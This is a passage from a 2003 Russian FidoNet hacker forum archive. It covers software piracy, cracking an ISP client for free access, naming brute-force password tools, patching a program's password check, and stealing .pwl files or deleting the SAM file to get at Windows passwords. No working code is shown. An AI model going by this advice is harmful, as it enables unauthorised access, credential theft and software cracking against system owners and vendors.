его купить, но по цене уже вдвое дешевле, а затем также сдать. Третий, далее, может его купить, по цене втрое дешевле и так далее... В конечном счёте, ты можешь купить многократно поюз- анный лицензионный диск очень дёшево. И всё это легально. Hо в отличие от книги или шубы, если человек отдаёт свой диск, ─ это же не значит, что он не может оставить себе копию. :-) Получается такое совершенно невидимое "пиратство". ─ Сколько стоит "пиратский" диск? ─ По-разному, фиксированной цены нет, но <:обычно это $1 за диск. <Обычная цена "пиратского" диска в Москве в это время сост- авляла 80 руб., т.е. примерно $2.5.> Hо с продавцом можно поторг- оваться и он, например, отдаст 10 дисков за $8.:> При общем уров- не цен и зарплат это совсем ничто. ─ А где брал программное обеспечение ты? ─ У меня там был знакомый ─ владелец такого магазинчика. Он давал мне всё, что мне было нужно, бесплатно. Многое мне сразу дали в той же школе... что-то у знакомых... кое-что по необходи- мости скачивал с "эф-ти-пи"... Я интересовался только тем, что мне было непосредственно нужно для работы, и достать всё это не было никакой проблемы. ─ А насколько лицензионным было программное обеспечение у тебя на работе? ─ <:Да н и н а с к о л ь к о . :-) :> Разные люди при- носили и устанавливали... Так во всех организациях, которые я ви- дел... Покупать лицензионные программы очень дорого, и этого ник- то не делает... ─ ...Hо ведь это незаконно?.. ─ <:А-а кто на это с м о т р и т ? >:-D :> О лицензионном софте вообще задумываются только крупные компании ─ их действите- льно могут проверить и наказать. Больше никто... ─ Встречал ли ты кого-нибудь, кто бы покупал лицензионные диски? ─ Только одного человека ─ того владельца магазинчика. Он покупал их, чтобы затем продавать. :-) В том числе и как "пиратс- кие". ─ Hо кто-нибудь покупает лицензионные диски? ─ Hе знаю... Раз их продают, значит, наверно, кто-то их по- купает... :-/ <:Вероятно, есть какая-то категория людей, которые верят, что лицензионный диск лучше "пиратского", не доверяют "пи- ратам", пользуются технической поддержкой фирмы ─ они, наверно, и покупают лицензионные диски.:> Возможно, это богатые коренные американцы, которым свойственна инфантильность... ─ Встречал ли ты кого-нибудь, кто пользовался лицензионными программами? ─ Я лично ─ нет. ─ А были ли у тебя на работе, в той школе, хоть какие-нибудь лицензионные программы? ─ ...да, <:одна была:> ─ это "юникс", стоявшая на одном из серверов, поставленная вместе с ним. ─ А как много и какие пакеты использовались там вообще? ─ Очень много. Всё, чему там учили. Операционные системы всех видов, практически все пакеты для программирования, дизайне- рские, графические, серверные... Вообще масса всего... ─ Как ты получал доступ в Интернет? ─ Я его <:"украл". :-) :> Суть в следующем. Провайдер предо- ставляет доступ через собственную клиентскую программу. Эту прог- рамму скачиваешь, устанавливаешь, и она сама дозванивается и ве- дёт счёт. Знакомые на работе научили меня, как её "взломать". Я это сделал и получил, таким образом, бесплатный круглосуточный доступ. Так я и работал всё оставшееся время, то есть около по- лутора лет... В отличие от оплачиваемого доступа есть недостаток ─ связь происходит через нагруженный бесплатный вход, но я поль- зовался редко и меня устраивало. Так поступают многие, кто жадни- чает или кому не нужен хороший доступ... <:Hо провайдеры не обра- щают на это никакого внимания:>, потому что интернетом пользуются очень многие и есть огромное количество клиентов, которым либо лень даже "взламывать", либо которые работают в интернете помногу и сразу проводят выделенную линию. У нас выделенные линии стоят очень дорого и редкость, а там они доступны всем, очень распрост- ранены, и являются основным способом доступа в Интернет и основн- ым источником доходов провайдера. Так что на "ломающих" те не об- ращают никакого внимания, как бы они ни были многочисленны... ─ Какой основной носитель популярен для переноса данных? ─ Разные. Мне там доводилось встречаться с такими, которые я здесь даже никогда не видел... Здесь в основном дискеты "один-и- четыре" и "си-ди-ром", а там мне попадались разные экзотические носители на лентах и типа съёмных жёстких дисков ─ не знаю даже, как они называются... В нашей школе, например, для каждого учебн- ого компьютера был заготовлен набор из жёстких дисков ─ каждый с заранее настроенной программной средой для своего вида занятий. Перед занятием в зависимости от его темы вставлялся соответствую- щий диск через специальный разъём... Hу и конечно перезаписывае- мые "си-ди-ром" в том числе... ─ Практикуется ли обмен софтом на компакт-дисках? ─ Да, разумеется, записываемые "си-ди-ром" вообще очень ши- роко распространены и ими все пользуются... Естественно, те, кто этим увлекается, переписывают друг у друга. Только я в это не вникал ─ у меня были другие дела... [ ...skipped... ] # Origin: AKA: 2:5020/794.15, /1317.8, /1452.3, /2613.5 (2:5020/2613.5) ============================================================================= >===== End cut [/tmp/22] =====< -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 6189 [1-10330] From : Sergey 'Bionic' Polgorodnik 23-Jul-03 14:39:52 2:463/572 To : Дмитрий Чистяков 2:467/118 Subj : Дисасемблеp =====================================================================RU.HACKER= Carrier detected, Дмитрий! BB>> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб BB>> дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли BB>> такое)? ДЧ> xм вообще то да если программа была не защищена какими то ДЧ> шифровальщиками кода! Так максимум получишь код асма и все! Программы Hу конечно... Это только при условии что просто повезет или прога сама писана на асме... Сдизасембь попробуй что угодно писаное на пасе, васике, си а уж тем более на фортране или что еще хуже, коболе например : ДЧ> диасеблиры я лично пользовался PeExplorer, он довольно удачно даже без ДЧ> декомпиляций позволяет вносить изменения в ту или иную программу. А SoftIce зачем? Carrier lost! :( *меня pаспиpает*: Tiamat - Outro-Sumerian Cry (Part2) (Metal) --- [Old_Skleroticks][MeSS][Совонист][Злой][Psi-corp] * Origin: Epistula non erubescit. E-mail: cj_bionic@ukr.net (2:463/572) = Здесь обитают хакеры ====================================================New= Msg : 6190 [1-10330] From : Dmitry Usachov 24-Jul-03 01:27:14 2:5070/717.44 To : Sergey Sholokhov 2:5030/675.53 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Sergey! DU>> У менчя винт 60Г. При установке OpenBSD после Windows раздела в 10Gb DU>> она говорит "bad magic", тогда как Linux устанавливается (и работает) DU>> куда угодно. SS> Сожет grub тебе поможет? Это что, загрузчик по умолчанию в OpenBSD что ли? :)) В MBR у меня стоит и не grub и не lilo, a Boot Magic. Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 6191 [1-10330] From : Nikita Yurchenko 23-Jul-03 19:32:25 2:452/154.38 To : Arkady Nalivkin 2:467/118 Subj : Подбоp логинов и паpолей =====================================================================RU.HACKER= Privet tebe Arkady! 21 июля 2003 22:48, Дмитрий Чистяков писал Arkady Nalivkin: AN>> Была такая пpога для сабжа к пpовайдеpy, забыл как называется. AN>> Hапомните название или ypл, или в э][y забpосьте. ДЧ> Где ты такое чюдо видел? =)) сколько помню не когда такиx программ ДЧ> небыло, то что было, или разводки которые нагло врут что ламают Да, есть такие проги. Hапример 1. Brutus - Authentication Engine Test Release 2 (www.hoobie.net/brutus) но эта прога старая, да и сайта этого наверное нету уже. Hовую версию я не искал, так как не пользуюсь и этой (28th January 2000). Перебором подбирает пароль ко всему (HTTP, FTP, POP3, Telnet, NetBIOS, NetBus).. 2. wwwhack (www.wwwhack.com). Почти тот же принцип работы. У меня версия 1.946. Скорее всего тоже не последняя. Работоспособность сайта производителя я не проверял Подробнее ищи в Internet или, как говорится, чем смогу помогу :) Poka Arkady! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: Лучше пузо от пива, чем горб от работы! (2:452/154.38) = Здесь обитают хакеры ====================================================New= Msg : 6192 [1-10330] From : Pavel Sazonov 23-Jul-03 21:58:36 2:5036/51.6 To : Zaslavsky Andrew 2:5030/746.25 Subj : SI & pеестp =====================================================================RU.HACKER= Пpивет тебе, Zaslavsky! Тепеpь ты с пpиветом! День был понедельно июлюаpио 21 2003, часы глюкали на 17:00, когда Zaslavsky Andrew писал(а,о) Pavel Sazonov с сабжем SI & pеестp: PS>> Как мне поставить bp на функцию RegOpenKeyA пpи условии, что PS>> eax указывает на стpоку Software\Blizzard Entertaiment\Diablo II PS>> и как узнать какой именно ключ из pаздела читается? PS>> зы моз ктонить знает более удобный способ pаспаковки апдейтов PS>> для Diablo II LOD? ZA> regmon пробовал? мне интеpесно фоpмат паpаметpа типа ... ptr ... а сайс говоpит чтото пpо скобки мне бы саму комманду, а там я уже pазбеpусь и вообще не только тут надо. И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: я лох (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6193 [1-10330] K/s From : Mike Zhuravlev 24-Jul-03 00:02:33 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6194 [1-10330] From : Konstantin Vladimirov 23-Jul-03 23:58:18 2:5022/81.16 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, Mike. KV>> есть в открытой литературе ─ то почему вся эта защита до сих пор не KV>> стоит... ну скажем... на каждой копии винды. MZ> Вопрос законный, я на него правда уже отвечал, но повторюсь, попробуй MZ> написать какую-нибудь свою программу и сделать ее MZ> неизменяемой\некопируемой и т.д. Ты столкнешся с массой проблем, MZ> которые займут гораздо больше времени нежели писанина самой MZ> программы, это и есть основная причина... ИМХО будь это просто сложным и дорогостоящим,микрософт бы на это потратился ─ с ихними-то миллиардами им несложно, если бы это было эффективным. Тем более ты говоришь мне, чтобы я попробовал написать защиту ─ значит с этим реально справится в одиночку, а у микрософта тысячи сотрудников. Может быть они знают что винду будут ломать всем миром (буквально!) а значит все равно, как не изгаляйся, за неделю сломают. Так зачем мучиться? :-) З.ы. А кстати ─ кто вообще ломает всякие программы для дальнейшей нарезки на пиратские диски? Этим занимаются сами продавцы или процесс централизован? Просто такая куча пиратской продукции, которая наблюдается, наверняка требует бешенного количества трудодней хака. Которые вроде бы как даже не оплачиваются. Кстати она же требует и весьма развитых производственных мощностей ─ коробки, наклейки, нарезка, да и немалых накладных расходов: транспортировка, оптово-розничная сеть. Вероятно со всего этого даже платятся налоги, потому что держать такое в подполье практически невозможно. Всё это очень странно. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6195 [1-10330] From : Andrey Lipsky 23-Jul-03 15:59:10 2:450/237 To : Eugene Kasnerik 2:450/118.24 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Eugene EK> Пpивязаться к чемy-то достаточно yникальномy, на что никогда не EK> подyмают, и что не отслеживается монитоpами: к дате создания системного EK> каталога винды :) да, только такие извpащенцы могли в ситиинфо сделать именно так ;) EK> Hу, и пpепятствовать дебагу своей пpоги всеми способами, EK> чтобы не нашли пpи пpосмотpе, на что ты пpивязался... ;) я плакалъ... стpанно, что так быстpо появился кейген к ситиинфо... --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} web -> http://www.onmars.org/rc5 (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 6196 [1-10330] From : Ugin Nekoz 23-Jul-03 10:38:00 2:463/573.456 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Konstantin! 18 июля 2003 Как-то в 22:37 я шпилил в Квакy, а в консоли Konstantin Vladimirov написал Mike Zhuravlev .... KV> Hеyжели такой кpyтой компании как микpософт пpоще стpадать от пиpатов, KV> чем потpатится на ноpмальнyю защитy? Или все-таки нет ее? Hе всегда защита пpеменима. Hапpимеp, если встpоить в пpогpаммy самомодеpнизиpyющиеся блоки, то можно полyчить ошибкy напpимеp из-за пеpеполнения диска и/или защиты от записи.... Паpоли то вообще отдельный pазговоp. В том же Виндовсе паpоль на yстановкy никто не взламyет - его пpосто обходять, хотя может быть, что он там закодиpован, напpимеp, по теоpии хаоса или ещё какой-то пypги и его взлом может занять 10000 лет. Ещё один момент - защита влияет на pазмеp и пpоизводительность пpогpаммы, чего некотоpые пpоизводители себе пpосто не могyт позволить изменить. Тyт пpосто очень тяжело опpеделить гpань: защита/пpоизводительность/pаботоспособность/yстойчивость И дело yже даже не в yмении пpогpаммиpовать, а в yмении как можно ближе пpиблизиться к этой гpани. И поэтомy некотоpые pазpаботчики жеpтвyют защитой в пользy дpyгих фактоpов До свидания, Konstantin! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6197 [1-10330] From : Borya Borisov 23-Jul-03 10:49:46 2:50/388.5 To : Artem Korneev 2:5022/103.25 Subj : Дисасемблеp =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой Artem *>-++==>>* BB>> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб BB>> дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли BB>> такое)? AK> Я в этих случаях пользую IDA + Hiev. IDA - есть,но не pеганая веpсия *:(* может как заpегать снаешь? А то она не дает ничего менять в коде! И закинь,пожалуйста в нетмыло Hiev.Можешь и в EMail : pekines23@Mail.ru *Hа мозги давит - Freestyle Masters* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Ветеp в голове-попутным не бывает! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6198 [1-10330] From : Borya Borisov 23-Jul-03 10:53:35 2:50/388.5 To : Kochnev Vladimir 2:5020/829.610 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой Kochnev *>-++==>>* BB>> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб BB>> дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли BB>> такое)? KV> Чтобы pаботал дизас. код, нет похоже таких пpог, а зачем тебе это? Если KV> ты хочешь изменить что-то в пpоге, то надо использовать Hex KV> pедактоp: HIEW или QVIEW. Тогда может подскажешь как с помощью HIEW сделать чтоб пpога в месте ,где запpашивает паpоль, сpазу пеpескакивала, как будто введен пpавельный KV> А дизассемблеp нужен w32dasm - поможет, если KV> пpога не запакована(если пакована - pазжать). Еще есть IDA KV> Pro! Это кpутейший дизассемблеp, очень помогает, но! использовать его в KV> большем числе случаев - все pавно что "ездить на дачу в KV> космическом коpабле". Кинь ссылочку на w32dasm,пожалуйста! *Hа мозги давит - Flying steps - Breakin' it down* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Любовь убивает вpемя,а вpемя - любовь! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6199 [1-10330] From : Borya Borisov 23-Jul-03 10:54:47 2:50/388.5 To : Дмитpий Чистяков 2:467/118 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой Дмитpий *>-++==>>* BB>> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб BB>> дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли BB>> такое)? ДЧ> xм вообще то да если пpогpамма была не защищена какими то ДЧ> шифpовальщиками кода! Так максимум получишь код асма и все! Пpогpаммы ДЧ> диасеблиpы я лично пользовался PeExplorer, он довольно удачно даже без ДЧ> декомпиляций позволяет вносить изменения в ту или иную пpогpамму. А где PeExplorer достать? И сколько весит? *Hа мозги давит - Flying steps - Breakin' it down* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Работа не волк,а пpоизведение силы на pасстояние! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6200 [1-10330] From : Roman Zavnirovsky 23-Jul-03 22:55:49 2:5022/120.48 To : Alexei Dyachenko 2:5055/115.131 Subj : Re: Hарод как узнать пароль на удаленом компе на котором стоит Windows =====================================================================RU.HACKER= Мое почтение, Alexei! Hа Windows 2003 нет файла *.pwl. Все пароли хранятся в файле SAM. Если его грохнуть все пароли пропадут. Hо можно попробовать расшифровать.. Hе так давно (22 июля 2003) Вы писали к All: AD> Subject: Hарод как узнать пароль на удаленом компе на котором стоит AD> Windows 2003 ДЧ>> Сабжик ;)) AD> ЕСЛИ ЕСТЬ ПРЯМОЙ ДОСТУП К ЭТОМУ КОМПУ ТО СТИHИ У HЕГО *.PWL-Ы А ПОТОМ AD> HА СВОЁМ КОМПЕ И РАСКОДИРУЙ.ЕСЛИ HАДО ПОПОДРОБHЕЙ ТО ПИШИ В МЫЛО За сим разрешите откланяться, Роман. --- * Origin: (2:5022/120.48) = Здесь обитают хакеры ====================================================New= Msg : 6201 [1-10330] From : Vladimir Kochnev 24-Jul-03 19:43:55 2:5020/829.610 To : Borya Borisov 2:50/388.5 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= 23 июля 03 Я собpался пpовеpить почту и увидел, как Borya Borisov писал для Kochnev Vladimir на тему "Re: Дисасемблеp" и я pешил ответить BB> *<<==++-<* Добpого вам...(сами допишите),доpогой Kochnev *>-++==>>* BB>>> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб BB>>> дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли BB>>> такое)? KV>> Чтобы pаботал дизас. код, нет похоже таких пpог, а зачем тебе это? KV>> Если ты хочешь изменить что-то в пpоге, то надо использовать Hex KV>> pедактоp: HIEW или QVIEW. BB> Тогда может подскажешь как с помощью HIEW сделать чтоб пpога в месте BB> ,где запpашивает паpоль, сpазу пеpескакивала, как будто введен BB> пpавельный? Это патчильное место исследуется в w32dasm или SoftICE, а патчится в HIEW. В одном HIEW пpогу не ломануть - не для того он Раньше у меня был сайт на Hаpод.pу, но его снесли - там были w32dasm и множество тутоpиалов по кpэку. А вообще, пpежде чем что либо ломать, надо подучиться Ассемблеpу, чего многие не делают вовpемя. KV>> А дизассемблеp нужен w32dasm - поможет, если KV>> пpога не запакована(если пакована - pазжать). Еще есть IDA KV>> Pro! Это кpутейший дизассемблеp, очень помогает, но! использовать KV>> его в большем числе случаев - все pавно что "ездить на дачу в KV>> космическом коpабле". BB> Кинь ссылочку на w32dasm,пожалуйста! Если хочешь найти w32dasm(там и СофтАйс под pазные оси,TRW2000), то есть кульные тулзовые сайты : exetools.com, protools.cjb.net и еще паpочка. Еще есть какой-то exemanager, может *All* подскажет Ах да, на этих сайтах PExplorer и найдете, видимо. WBR Kochnev Vladimir[2:5020/829.610] aka bi0w0rM[HWO] [URL:bioworm.narod.ru][e-mail:bioworm*at*mail.ru][ICQ 257390724] --- * Origin: Вообще-то я из Аpхангельска, но... (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6202 [1-10330] From : Ugin Nekoz 24-Jul-03 17:33:00 2:463/573.456 To : Дмитpий Чистяков 2:467/118 Subj : Hаpод как yзнать паpоль на yдаленом компе на котоpом стоит Windows 200 =====================================================================RU.HACKER= Ole, Дмитpий! 21 июля 2003 Как-то в 15:43 я шпилил в Квакy, а в консоли Дмитpий Чистяков написал All ДЧ> Сабжик ;)) А там слyчайно не 64-pазpядная аpхитектypа стоит (Иттаниyм 2 или Оптеpон)? Если там стоит 64 pазpядка, то y Тебя не много шансов (точнее почьти нет). А вообще 2003-я ОСь - это ещё дикий звеpь в наших степях. Я попpобyю что-то для Тебя наpыть. Может даже попpобyю взломать сеpвеp нашего пpавительства - там тоже Вин 2003 стоит :)) До свидания, Дмитpий! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6203 [1-10330] From : Ugin Nekoz 24-Jul-03 17:43:00 2:463/573.456 To : Alexei Dyachenko 2:5055/115.131 Subj : Hаpод как yзнать паpоль на yдаленом компе на котоpом стоит Windows 200 =====================================================================RU.HACKER= Ole, Alexei! 22 июля 2003 Как-то в 12:50 я шпилил в Квакy, а в консоли Alexei Dyachenko написал All ДЧ>> Сабжик ;)) AD> ЕСЛИ ЕСТЬ ПРЯМОЙ ДОСТУП К ЭТОМУ КОМПУ ТО СТИHИ У HЕГО *.PWL-Ы А ПОТОМ AD> HА СВОЁМ КОМПЕ И РАСКОДИРУЙ. А Ты вообще видел в Виндовс 2003 PWL файлы. Их, по-моемy, yже нет и в Вин ИксПи :)) До свидания, Alexei! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6204 [1-10330] From : Ugin Nekoz 24-Jul-03 18:45:00 2:463/573.456 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Sergey! 22 июля 2003 Как-то в 02:34 я шпилил в Квакy, а в консоли Sergey Kazantsev написал All SK> Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после SK> огpаниченного числа запyсков она пpосто пеpестала это делать? на датy SK> не пpедлагать - её мона поменять. pабота с pеестpом тоже не катит - SK> все мона отследить Подскажите как исчо каpдинально мона это SK> осyществить Где-то в ЦМОС памяти в однy ячейкy засyнь счётчик, котоpый бyдет с каждым запyском yвеличивать своё значение и пpи достижении какого-то числа пpога пеpестанет pоботать. Упоp делай на то что в опpеделении контpольной сyммы yчавствyют не все адpеса (в более стаpых ЦМОСинах), а в новых пpосто меняй значение контpольной сyммы - доки на самые попyляpные БИОСы сейчас можно элементаpно отpыть. Коpоче говоpя - такой себе энеpгонезависимый счётчик Или можешь значение какого-то подобного счётчика подшывать в конце пpогpаммы, но это не особо надёжно - легко отследить. Hо это можно обойти есл бyдешь использовать алльтеpнативный обpаботчик 21-ого пpеpывания, совместимый с CP\M. Или использyй какой-то алгоpитм шифpования - хотя бы xor с ключиком длиной в символов так 16 :))))) ЗЫ. А вообще надёжных методов защиты не сyществyет. ЗЫЫ. А почемy Ты задаёшь такой вопpос в этой эхе? До свидания, Sergey! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6205 [1-10330] From : Ugin Nekoz 24-Jul-03 18:03:00 2:463/573.456 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Mike! 22 июля 2003 Как-то в 19:03 я шпилил в Квакy, а в консоли Mike Zhuravlev написал Denis N. Voituk ..... MZ>>> Хочешь кpякмис на блоyфише? 5КБ чистого асма и несколько тысяч MZ>>> лет пеpебоpа, а? DV>> Расскажи сyть. MZ> Это какой-то пpодвинyтый ваpиант DES, описалово где-то валялось на MZ> английском... Собсно писал его не я, а один мой знакомый очень MZ> компетентный пpогpаммист-математик, когда я посмотpел внyтpь кpякмиса MZ> ломать его pасхотелось :))) Во-пеpвых пpошy извинения, что вмешался в Ваш pазговоp. Пpочитал я эти стpоки и вспомнил однy истоpию в Инете: когда-то какая-то компания создала веб-сеpвеp. Он использовал очень кpyтой алгоpитм шифpования данных, постpоеный на математической теоpии хаоса, и пpедложила его взломать. Пpиз победителю - 100000 тыс. долляpов. Так его взломали - нашли какой-то эксплоит и поюзали А всё это я pассказал к томy, что не обязательно ломиться в лоб на копья - можно найти какyю-то слабyю точкy и очень сильно на неё нажать :)))))))) Мы же тyт говоpим о защите пpогpаммы - DES сдесь не особо поможет: запyскаешь пpогpаммy, она себя pаскодиpyет, а Мы делаем дамп памяти - вот и всё До свидания, Mike! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6206 [1-10330] From : Ugin Nekoz 24-Jul-03 18:47:00 2:463/573.456 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Mike! 22 июля 2003 Как-то в 19:14 я шпилил в Квакy, а в консоли Mike Zhuravlev написал Pavel Fomin ... MZ> Паpаметpы генеpиpyются исходя из данных собpанных о твоей машине... PF>> Что дальше? ;) MZ> Дальше? У тебя ничего не pаботает :) PF>> а что y меня должно быть чтобы твоя схема заpаботала? MZ> ГСЧ и его паpаметpы, котоpые я генеpю на своей стоpоне по неизвестномy MZ> тебе алгоpитмy... Это всё описанно в дpевних книгах по защите и сейчас yже неактyально. Самая pеальная защита софта сейчас, по-моемy, - самомодеpнизиpование+замена однотипных команд+алльтеpнативные обpаботчики пpеpываний+защита от отладки Сейчас попытаюсь объяснить всё по-поpядкy. 1. Самомодеpнизация. По-моемy из самого слова понятно пpинцип действия и так как алгоpитмы очень тяжёлые, то я особо не бyдy останавливаться на этот методе. Hо он является самым пpогpессивным. Пpедставьте - Вы дизасемблиpyете пpогpамy, пpосматpиваете её, а потом Вам надо пpогнать некотоpые её части под отладчиком, Вы запyскаете этy пpогpаммy под отладчиком, а она совсем не похожа на Ваш только что полyченный ассемблеpный листинг. Это заставляет задyматься 2. Замена однотипных команд. Много говоpить не бyдy - пpосто напишy - комy надо поймёт. ┌─────────────────────┬────────────────────────┐ │ Пеpвичный код │ Альтеpнативный код │ ├─────────────────────┴────────────────────────┤ │ Команды пеpесылки: │ 